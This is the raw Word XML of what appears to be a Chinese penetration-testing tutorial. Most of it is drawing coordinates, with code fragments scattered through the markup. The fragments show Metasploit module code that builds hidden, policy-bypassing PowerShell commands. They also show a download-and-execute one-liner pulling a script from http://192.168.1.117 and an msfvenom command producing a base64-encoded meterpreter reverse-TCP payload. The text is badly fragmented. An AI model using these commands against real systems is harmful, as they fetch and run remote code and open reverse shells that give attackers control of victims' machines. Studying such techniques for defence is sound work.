,10484,9051,10484,9052,10484,9053,10484,9054,10484,9055,10484,9057,10484,9058,10484,9059,10484,9061,10484,9062,10484,9064,10484,9066,10484,9067,10484,9069,10484,9071,10484,9073,10484,9075,10484,9078,10484,9080,10484,9083,10484,9085,10484,9088,10484,9091,10484,9094,10484,9097,10484,9100,10484,9103,10484,9107,10484,9110,10484,9114,10484,9118,10484,9122,10484,9126,10484,9130,10484,9135,10484,9139,10484,9144,10484,9149,10484,9154,10484,9159,10484,9164,10484,9170,10484,9175,10484,9181,10484,9187,10484,9193,10484,9199,10484,9206,10484,9213,10484,9219,10484,9227,10484,9234,10484,9241,10484,9249,10484,9257,10484,9265,10484,9273,10484,9281,10484,9290,10484,9298,10484,9307,10484,9317,10484,9326,10484,9336,10484,9346,10484,9356,10484,9366,10484,9376,10484,9387,10484,9398,10484,9409,10484,9421,10484,9432,10484,9444,10484,9456,10484,9469,10484,9481,10484,9494,10484,9507,10484,9521,10484,9534,10484,9548,10484,9563,10484,9577,10484,9592,10484,9607,10484,9622,10484,9637,10484,9653,10484,9669,10484,9685,10484,9702,10484,9719,10484,9719,10484,9719,10484,9719,10484,9719,10484,9719,10484,9719,10483,9719,10482,9719,10482,9719,10480,9719,10479,9719,10477,9719,10475,9719,10473,9719,10470,9719,10466,9719,10462,9719,10458,9719,10453,9719,10448,9719,10442,9719,10435,9719,10428,9719,10419,9719,10411,9719,10401,9719,10391,9719,10379,9719,10367,9719,10354,9719,10340,9719,10326,9719,10310,9719,10293,9719,10275,9719,10256,9719,10236,9719,10215,9719,10192,9719,10168,9719,10143,9719,10117,9719,10090,9719,10061,9719,10031,9719,9999,9719,9966,9719,9931,9719,9895,9719,9858,9719,9819,9719,9778,9719,9735,9719,9691,9719,9646,9719,9598,9719,9549,9719,9498,9719,9445,9719,9391,9719,9334,9719,9275,9719,9215,9719,9153,9719,9088,9719,9022,9719,8953,9719,8883,9719,8810,9719,8735,9719,8658,9719,8578,9719,8497,9719,8413,9719,8326,9719,8238,9719,8146,9719,8053,9719,7957,9719,7859,9719,7758,9719,7654,9719,7548,9719,7439,9719,7328,9719,7214,9719,7097,9719,6977,9719,6855,9719,6730,9719,6602,9719,6471,9719,6337,9719,6201,9719,6061,9719,5918,9719,5773,9719,5624,9719,5472,9719,5317,9719,5159,9719,4997,9719,4833,9719,4665,9719,4494,9719,4319,9719,4141,9719,3960,9719,3776,9719,3587,9719,3396,9719,3201,9719,3002,9719,2800,9719,2594,9719,2385,9719,2172,9719,1955,9719,1734,9719,1510,9719,1510,9719,1510,9719,1510,9719,1510,9719,1510,9719,1510,9719,1510,9719,1510,9719,1510,9719,1510,9719,1510,9718,1510,9718,1510,9718,1510,9718,1510,9718,1510,9718,1510,9717,1510,9717,1510,9717,1510,9716,1510,9716,1510,9715,1510,9715,1510,9714,1510,9713,1510,9713,1510,9712,1510,9711,1510,9710,1510,9709,1510,9708,1510,9707,1510,9706,1510,9704,1510,9703,1510,9702,1510,9700,1510,9699,1510,9697,1510,9695,1510,9693,1510,9691,1510,9689,1510,9687,1510,9685,1510,9682,1510,9680,1510,9677,1510,9675,1510,9672,1510,9669,1510,9666,1510,9663,1510,9659,1510,9656,1510,9652,1510,9649,1510,9645,1510,9641,1510,9637,1510,9632,1510,9628,1510,9623,1510,9619,1510,9614,1510,9609,1510,9604,1510,9598,1510,9593,1510,9587,1510,9581,1510,9575,1510,9569,1510,9563,1510,9556,1510,9550,1510,9543,1510,9536,1510,9529,1510,9521,1510,9514,1510,9506,1510,9498,1510,9490,1510,9481,1510,9473,1510,9464,1510,9455,1510,9446,1510,9436,1510,9427,1510,9417,1510,9407,1510,9397,1510,9386,1510,9375,1510,9364,1510,9353,1510,9342,1510,9330,1510,9318,1510,9306,1510,9294,1510,9281,1510,9268,1510,9255,1510,9242,1510,9228,1510,9214,1510,9200,1510,9185,1510,9171,1510,9156,1510,9141,1510,9125,1510,9109,1510,9093,1510,9077,1510,9060,1510,9044e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:450.600pt;width:445.800pt;height:35.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:611.500pt;width:0.500pt;height:46.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,12230" coordsize="10,930">
        <v:shape style="position:absolute;left:10390;top:12230;width:10;height:930" coordorigin="10390,12230" coordsize="10,930" path="m10402,12240l10402,12240,10402,12240,10402,12240,10402,12240,10402,12240,10402,12240,10402,12240,10402,12240,10402,12240,10402,12241,10402,12241,10402,12241,10402,12241,10402,12241,10402,12242,10402,12242,10402,12242,10402,12243,10402,12243,10402,12244,10402,12245,10402,12245,10402,12246,10402,12247,10402,12248,10402,12249,10402,12250,10402,12251,10402,12252,10402,12254,10402,12255,10402,12257,10402,12258,10402,12260,10402,12262,10402,12264,10402,12266,10402,12268,10402,12270,10402,12273,10402,12276,10402,12278,10402,12281,10402,12284,10402,12287,10402,12290,10402,12294,10402,12297,10402,12301,10402,12305,10402,12309,10402,12313,10402,12318,10402,12322,10402,12327,10402,12332,10402,12337,10402,12342,10402,12348,10402,12354,10402,12359,10402,12365,10402,12372,10402,12378,10402,12385,10402,12392,10402,12399,10402,12406,10402,12414,10402,12422,10402,12430,10402,12438,10402,12446,10402,12455,10402,12464,10402,12473,10402,12483,10402,12492,10402,12502,10402,12512,10402,12523,10402,12534,10402,12545,10402,12556,10402,12567,10402,12579,10402,12591,10402,12604,10402,12616,10402,12629,10402,12643,10402,12656,10402,12670,10402,12684,10402,12699,10402,12714,10402,12729,10402,12744,10402,12760,10402,12776,10402,12792,10402,12809,10402,12826,10402,12844,10402,12861,10402,12879,10402,12898,10402,12917,10402,12936,10402,12955,10402,12975,10402,12995,10402,13016,10402,13037,10402,13058,10402,13080,10402,13102,10402,13125,10402,13147,10402,13171e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:611.500pt;width:449.500pt;height:46.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12230" coordsize="8990,930">
        <v:shape style="position:absolute;left:1490;top:12230;width:8990;height:930" coordorigin="1490,12230" coordsize="8990,930" path="m1510,12240l1510,12240,1510,12240,1510,12240,1510,12240,1510,12240,1510,12240,1511,12240,1512,12240,1512,12240,1514,12240,1515,12240,1517,12240,1519,12240,1521,12240,1524,12240,1528,12240,1532,12240,1536,12240,1541,12240,1546,12240,1552,12240,1559,12240,1566,12240,1575,12240,1583,12240,1593,12240,1603,12240,1615,12240,1627,12240,1640,12240,1654,12240,1668,12240,1684,12240,1701,12240,1719,12240,1738,12240,1758,12240,1780,12240,1802,12240,1826,12240,1851,12240,1877,12240,1904,12240,1933,12240,1963,12240,1995,12240,2028,12240,2063,12240,2099,12240,2136,12240,2175,12240,2216,12240,2259,12240,2303,12240,2348,12240,2396,12240,2445,12240,2496,12240,2549,12240,2604,12240,2660,12240,2719,12240,2779,12240,2841,12240,2906,12240,2972,12240,3041,12240,3112,12240,3184,12240,3259,12240,3336,12240,3416,12240,3498,12240,3582,12240,3668,12240,3757,12240,3848,12240,3941,12240,4037,12240,4136,12240,4236,12240,4340,12240,4446,12240,4555,12240,4666,12240,4780,12240,4897,12240,5017,12240,5139,12240,5264,12240,5392,12240,5523,12240,5657,12240,5793,12240,5933,12240,6076,12240,6222,12240,6370,12240,6522,12240,6677,12240,6835,12240,6997,12240,7161,12240,7329,12240,7500,12240,7675,12240,7853,12240,8034,12240,8219,12240,8407,12240,8598,12240,8793,12240,8992,12240,9194,12240,9400,12240,9609,12240,9823,12240,10039,12240,10260,12240,10484,12240,10484,12240,10484,12240,10484,12240,10484,12240,10484,12240,10484,12240,10484,12240,10484,12240,10484,12240,10484,12241,10484,12241,10484,12241,10484,12241,10484,12241,10484,12242,10484,12242,10484,12242,10484,12243,10484,12243,10484,12244,10484,12245,10484,12245,10484,12246,10484,12247,10484,12248,10484,12249,10484,12250,10484,12251,10484,12252,10484,12254,10484,12255,10484,12257,10484,12258,10484,12260,10484,12262,10484,12264,10484,12266,10484,12268,10484,12270,10484,12273,10484,12276,10484,12278,10484,12281,10484,12284,10484,12287,10484,12290,10484,12294,10484,12297,10484,12301,10484,12305,10484,12309,10484,12313,10484,12318,10484,12322,10484,12327,10484,12332,10484,12337,10484,12342,10484,12348,10484,12354,10484,12359,10484,12365,10484,12372,10484,12378,10484,12385,10484,12392,10484,12399,10484,12406,10484,12414,10484,12422,10484,12430,10484,12438,10484,12446,10484,12455,10484,12464,10484,12473,10484,12483,10484,12492,10484,12502,10484,12512,10484,12523,10484,12534,10484,12545,10484,12556,10484,12567,10484,12579,10484,12591,10484,12604,10484,12616,10484,12629,10484,12643,10484,12656,10484,12670,10484,12684,10484,12699,10484,12714,10484,12729,10484,12744,10484,12760,10484,12776,10484,12792,10484,12809,10484,12826,10484,12844,10484,12861,10484,12879,10484,12898,10484,12917,10484,12936,10484,12955,10484,12975,10484,12995,10484,13016,10484,13037,10484,13058,10484,13080,10484,13102,10484,13125,10484,13147,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10483,13171,10482,13171,10482,13171,10480,13171,10479,13171,10477,13171,10475,13171,10473,13171,10470,13171,10466,13171,10462,13171,10458,13171,10453,13171,10448,13171,10442,13171,10435,13171,10428,13171,10419,13171,10411,13171,10401,13171,10391,13171,10379,13171,10367,13171,10354,13171,10340,13171,10326,13171,10310,13171,10293,13171,10275,13171,10256,13171,10236,13171,10215,13171,10192,13171,10168,13171,10143,13171,10117,13171,10090,13171,10061,13171,10031,13171,9999,13171,9966,13171,9931,13171,9895,13171,9858,13171,9819,13171,9778,13171,9735,13171,9691,13171,9646,13171,9598,13171,9549,13171,9498,13171,9445,13171,9391,13171,9334,13171,9275,13171,9215,13171,9153,13171,9088,13171,9022,13171,8953,13171,8883,13171,8810,13171,8735,13171,8658,13171,8578,13171,8497,13171,8413,13171,8326,13171,8238,13171,8146,13171,8053,13171,7957,13171,7859,13171,7758,13171,7654,13171,7548,13171,7439,13171,7328,13171,7214,13171,7097,13171,6977,13171,6855,13171,6730,13171,6602,13171,6471,13171,6337,13171,6201,13171,6061,13171,5918,13171,5773,13171,5624,13171,5472,13171,5317,13171,5159,13171,4997,13171,4833,13171,4665,13171,4494,13171,4319,13171,4141,13171,3960,13171,3776,13171,3587,13171,3396,13171,3201,13171,3002,13171,2800,13171,2594,13171,2385,13171,2172,13171,1955,13171,1734,13171,1510,13171,1510,13171,1510,13171,1510,13171,1510,13171,1510,13171,1510,13171,1510,13171,1510,13170,1510,13170,1510,13170,1510,13170,1510,13170,1510,13170,1510,13169,1510,13169,1510,13169,1510,13168,1510,13168,1510,13167,1510,13167,1510,13166,1510,13166,1510,13165,1510,13164,1510,13163,1510,13162,1510,13161,1510,13160,1510,13159,1510,13157,1510,13156,1510,13154,1510,13153,1510,13151,1510,13149,1510,13147,1510,13145,1510,13143,1510,13140,1510,13138,1510,13135,1510,13133,1510,13130,1510,13127,1510,13124,1510,13120,1510,13117,1510,13113,1510,13110,1510,13106,1510,13102,1510,13097,1510,13093,1510,13088,1510,13084,1510,13079,1510,13074,1510,13068,1510,13063,1510,13057,1510,13051,1510,13045,1510,13039,1510,13033,1510,13026,1510,13019,1510,13012,1510,13005,1510,12997,1510,12989,1510,12981,1510,12973,1510,12965,1510,12956,1510,12947,1510,12938,1510,12928,1510,12919,1510,12909,1510,12898,1510,12888,1510,12877,1510,12866,1510,12855,1510,12843,1510,12832,1510,12819,1510,12807,1510,12794,1510,12781,1510,12768,1510,12755,1510,12741,1510,12727,1510,12712,1510,12697,1510,12682,1510,12667,1510,12651,1510,12635,1510,12618,1510,12602,1510,12585,1510,12567,1510,12550,1510,12531,1510,12513,1510,12494,1510,12475,1510,12456,1510,12436,1510,12415,1510,12395,1510,12374,1510,12353,1510,12331,1510,12309,1510,12286,1510,12263,1510,12240e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:611.400pt;width:445.800pt;height:46.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:678.600pt;width:467.400pt;height:58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600" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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datastore[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'x64'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="48" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1840" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd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+=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'c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="2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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="48" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1600" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>se</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="48" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1600" w:right="7077" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd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+=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'powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-9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pacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1600" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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datastore[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'payload'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="48" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1600" w:right="3955" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd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+=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'-windowstyle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hidden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-exec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bypass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-NoExit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-8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'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pacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1360" w:right="6116" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd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+=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c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"-EncodedCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#{base64}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"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a90c90"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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a90c90"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>end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8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if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use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2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caidao</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="48" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1074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execute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echo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powershell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-windowstyle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hidden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-exec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bypass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-c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\""IEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6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(New-Object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Net.WebClient).DownloadString('http://192.168.1.117/xxx.ps1');\""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|msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7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x64/xor4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  <w:spacing w:val="1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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1314" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="006900"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#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xxx.ps1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is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msfvenom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-p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windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6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LHOST=xx.xx.xx.xx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LPORT=xx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-f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psh-reflection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|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msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="6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-e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powershell/base64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--arch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x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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--platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="006900"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>windows.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7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powershell_base64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rb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metasploit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framework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embedded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framework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odules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encoders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powershell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powershell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empty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mkdir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powershell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7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2244" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参数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选择是否使用Metasploit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payload，来去掉powershell的关键字。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例1（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目标出网，下载执行）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="50" w:after="0" w:line="263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powershell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windowstyle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hidden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bypass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""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IEX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Object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WebClient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dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DownloadString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'http://192.168.1.117/micropoor.ps1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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""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powershell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base64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arch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platform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443.500pt;width:449.500pt;height:47.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8870" coordsize="8990,950">
        <v:shape style="position:absolute;left:1490;top:8870;width:8990;height:950" coordorigin="1490,8870" coordsize="8990,950" path="m1510,8893l1510,8893,1510,8893,1510,8893,1510,8893,1510,8893,1510,8893,1511,8893,1512,8893,1512,8893,1514,8893,1515,8893,1517,8893,1519,8893,1521,8893,1524,8893,1528,8893,1532,8893,1536,8893,1541,8893,1546,8893,1552,8893,1559,8893,1566,8893,1575,8893,1583,8893,1593,8893,1603,8893,1615,8893,1627,8893,1640,8893,1654,8893,1668,8893,1684,8893,1701,8893,1719,8893,1738,8893,1758,8893,1780,8893,1802,8893,1826,8893,1851,8893,1877,8893,1904,8893,1933,8893,1963,8893,1995,8893,2028,8893,2063,8893,2099,8893,2136,8893,2175,8893,2216,8893,2259,8893,2303,8893,2348,8893,2396,8893,2445,8893,2496,8893,2549,8893,2604,8893,2660,8893,2719,8893,2779,8893,2841,8893,2906,8893,2972,8893,3041,8893,3112,8893,3184,8893,3259,8893,3336,8893,3416,8893,3498,8893,3582,8893,3668,8893,3757,8893,3848,8893,3941,8893,4037,8893,4136,8893,4236,8893,4340,8893,4446,8893,4555,8893,4666,8893,4780,8893,4897,8893,5017,8893,5139,8893,5264,8893,5392,8893,5523,8893,5657,8893,5793,8893,5933,8893,6076,8893,6222,8893,6370,8893,6522,8893,6677,8893,6835,8893,6997,8893,7161,8893,7329,8893,7500,8893,7675,8893,7853,8893,8034,8893,8219,8893,8407,8893,8598,8893,8793,8893,8992,8893,9194,8893,9400,8893,9609,8893,9823,8893,10039,8893,10260,8893,10484,8893,10484,8893,10484,8893,10484,8893,10484,8893,10484,8894,10484,8894,10484,8894,10484,8894,10484,8894,10484,8894,10484,8894,10484,8894,10484,8894,10484,8895,10484,8895,10484,8895,10484,8896,10484,8896,10484,8897,10484,8897,10484,8898,10484,8899,10484,8899,10484,8900,10484,8901,10484,8902,10484,8903,10484,8905,10484,8906,10484,8907,10484,8909,10484,8910,10484,8912,10484,8914,10484,8916,10484,8918,10484,8920,10484,8922,10484,8924,10484,8927,10484,8929,10484,8932,10484,8935,10484,8938,10484,8941,10484,8945,10484,8948,10484,8952,10484,8956,10484,8959,10484,8964,10484,8968,10484,8972,10484,8977,10484,8982,10484,8987,10484,8992,10484,8997,10484,9003,10484,9009,10484,9015,10484,9021,10484,9027,10484,9034,10484,9041,10484,9048,10484,9055,10484,9062,10484,9070,10484,9078,10484,9086,10484,9094,10484,9103,10484,9112,10484,9121,10484,9130,10484,9140,10484,9150,10484,9160,10484,9170,10484,9181,10484,9192,10484,9203,10484,9214,10484,9226,10484,9238,10484,9250,10484,9263,10484,9276,10484,9289,10484,9302,10484,9316,10484,9330,10484,9345,10484,9359,10484,9375,10484,9390,10484,9406,10484,9422,10484,9438,10484,9455,10484,9472,10484,9489,10484,9507,10484,9525,10484,9543,10484,9562,10484,9581,10484,9600,10484,9620,10484,9640,10484,9661,10484,9682,10484,9703,10484,9725,10484,9747,10484,9769,10484,9792,10484,9815,10484,9839,10484,9839,10484,9839,10484,9839,10484,9839,10484,9839,10484,9839,10483,9839,10482,9839,10482,9839,10480,9839,10479,9839,10477,9839,10475,9839,10473,9839,10470,9839,10466,9839,10462,9839,10458,9839,10453,9839,10448,9839,10442,9839,10435,9839,10428,9839,10419,9839,10411,9839,10401,9839,10391,9839,10379,9839,10367,9839,10354,9839,10340,9839,10326,9839,10310,9839,10293,9839,10275,9839,10256,9839,10236,9839,10215,9839,10192,9839,10168,9839,10143,9839,10117,9839,10090,9839,10061,9839,10031,9839,9999,9839,9966,9839,9931,9839,9895,9839,9858,9839,9819,9839,9778,9839,9735,9839,9691,9839,9646,9839,9598,9839,9549,9839,9498,9839,9445,9839,9391,9839,9334,9839,9275,9839,9215,9839,9153,9839,9088,9839,9022,9839,8953,9839,8883,9839,8810,9839,8735,9839,8658,9839,8578,9839,8497,9839,8413,9839,8326,9839,8238,9839,8146,9839,8053,9839,7957,9839,7859,9839,7758,9839,7654,9839,7548,9839,7439,9839,7328,9839,7214,9839,7097,9839,6977,9839,6855,9839,6730,9839,6602,9839,6471,9839,6337,9839,6201,9839,6061,9839,5918,9839,5773,9839,5624,9839,5472,9839,5317,9839,5159,9839,4997,9839,4833,9839,4665,9839,4494,9839,4319,9839,4141,9839,3960,9839,3776,9839,3587,9839,3396,9839,3201,9839,3002